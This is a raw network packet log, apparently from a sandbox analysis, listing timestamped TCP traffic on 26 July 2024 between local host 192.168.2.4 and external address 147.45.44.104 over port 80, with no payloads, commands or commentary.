Jul 26, 2024 18:56:40.311332941 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.311362028 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.311953068 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.311963081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.311992884 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.312012911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.312119007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.312129021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.312151909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.312161922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.312918901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.312927961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.312937021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.312947035 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.312956095 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.312959909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.312980890 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.312993050 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.313831091 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.313842058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.313851118 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.313859940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.313914061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.313914061 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.314613104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.314624071 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.314632893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.314642906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.314655066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.314682007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.314743996 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.314781904 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.315546989 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.315557957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.315567017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.315577030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.315592051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.315620899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.316462994 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.316473007 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.316500902 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.316525936 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.316656113 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.316667080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.316675901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.316687107 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.316699982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.316724062 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.317428112 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.317439079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.317447901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.317457914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.317471027 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.317506075 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.317574024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.317608118 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.318213940 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.318254948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.318383932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.318394899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.318403959 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.318428993 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.318451881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.319139957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.319150925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.319159985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.319169998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.319179058 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.319184065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.319212914 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.319922924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.319933891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.319943905 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.319961071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.319987059 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.320056915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.320097923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.321022034 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.321033001 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.321043015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.321053982 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.321062088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.321064949 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.321083069 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.321111917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.321479082 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.321517944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.321676016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.321686983 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.321696997 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.321706057 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.321710110 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.321717024 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.321726084 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.321753979 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.322453976 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.322464943 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.322474957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.322489977 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.322493076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.322504044 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.322515965 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.322540045 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.322601080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.322611094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.322619915 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.322637081 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.322660923 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.324791908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.324803114 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.324807882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.324820042 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.324829102 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.324837923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.324847937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.324847937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.324858904 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.324863911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.324906111 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.324939013 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.324950933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.324975014 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.325128078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.325139046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.325146914 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.325156927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.325165033 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.325166941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.325182915 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.325212955 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.325300932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.325311899 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.325337887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.325359106 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.325947046 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.325958014 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.325967073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.325989008 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.326013088 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.326520920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.326531887 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.326561928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.326576948 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.326715946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.326725960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.326754093 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.326769114 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.327308893 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.327318907 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.327328920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.327339888 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.327353954 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.327384949 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.327908993 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.327951908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.328049898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.328059912 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.328068972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.328079939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.328089952 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.328111887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.328840971 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.328850985 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.328860998 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.328871012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.328881025 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.328907967 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.329613924 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.329624891 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.329633951 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.329643965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.329652071 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.329653978 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.329689980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.329788923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.329838037 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.330624104 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.330634117 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.330642939 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.330653906 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.330668926 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.330693007 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.330764055 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.330811024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.331577063 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.331588030 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.331595898 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.331605911 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.331615925 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.331619024 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.331649065 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.331703901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.331737041 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.332551956 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.332561016 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.332570076 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.332598925 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.332628012 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.332694054 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.332705021 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.332714081 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.332732916 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.332750082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.333527088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.333574057 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.333676100 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.333687067 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.333695889 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.333704948 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.333714962 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.333722115 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.333753109 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.334589005 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.334599972 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.334608078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.334618092 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.334626913 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.334635973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.334642887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.334672928 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.335508108 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.335527897 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.335536957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.335546017 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.335557938 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.335562944 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.335572958 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.335582018 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.335598946 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.335625887 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.336288929 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.336301088 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.336309910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.336319923 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.336329937 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.336347103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.336379051 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.336432934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.336472988 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.337207079 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.337219000 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.337228060 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.337238073 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.337248087 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.337254047 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.337285042 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.337968111 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.337979078 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.337985992 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.337996960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.338006020 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.338011980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.338037968 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.338099957 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.338136911 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.338802099 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.338840961 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.338974953 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.338985920 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.338995934 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.339006901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.339011908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.339030981 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.339056015 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.340173960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.340183973 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.340192080 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.340200901 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.340209961 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.340212107 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.340221882 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.340241909 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.340264082 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.341049910 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.341061115 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.341068029 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.341079950 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.341087103 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.341089964 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.341125011 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.341156006 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.341176987 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.341305017 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.341322899 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.341336012 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.341346979 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.341355085 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.341366053 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.341376066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.341376066 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.341388941 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.341399908 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.341419935 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.342109919 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.342120886 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.342129946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.342142105 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.342152119 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.342152119 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.342165947 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.342192888 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.343884945 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.343939066 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.343995094 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.344006062 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.344033003 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.344049931 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.344173908 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.344218016 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.344366074 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.344377041 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.344403982 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.344440937 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.345426083 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.345459938 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.345567942 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.345577955 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.345587015 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.345619917 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.345635891 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.345701933 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.345711946 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.345721960 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.345732927 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.345733881 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.345743895 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.345763922 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.345788002 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.345865965 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.345876932 CEST	80	49757	147.45.44.104	192.168.2.4
Jul 26, 2024 18:56:40.345895052 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.345911980 CEST	49757	80	192.168.2.4	147.45.44.104
Jul 26, 2024 18:56:40.346520901 CEST	80	49757	147.45.44.104	192.168.2.4
